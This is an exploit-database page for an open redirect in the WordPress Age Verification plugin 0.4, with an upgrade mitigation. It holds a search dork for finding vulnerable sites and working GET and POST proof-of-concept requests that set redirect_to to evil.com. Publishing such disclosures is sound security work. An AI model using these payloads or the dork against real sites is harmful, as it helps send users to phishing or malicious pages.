header-logo
Suggest Exploit
vendor:
Age Verification plugin
by:
Gianluca Brindisi
7,5
CVSS
HIGH
Open Redirect
601
CWE
Product Name: Age Verification plugin
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Age Verification plugin <= 0.4 Open Redirect

The Wordpress Age Verification plugin version 0.4 is vulnerable to open redirect. An attacker can craft a malicious URL with a redirect parameter and redirect a victim to a malicious website. This can be done via GET or POST request.

Mitigation:

Upgrade to the latest version of the plugin.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php 
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4

1)  Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
    
    The rendered page will provide a link to http://www.evil.com

2)  Via POST: http://server/wp-content/plugins/age-verification/age-verification.php
    redirect_to:    http://www.evil.com
    age_day:        1
    age_month:      1
    age_year:       1970

    Direct redirect to http://www.evil.com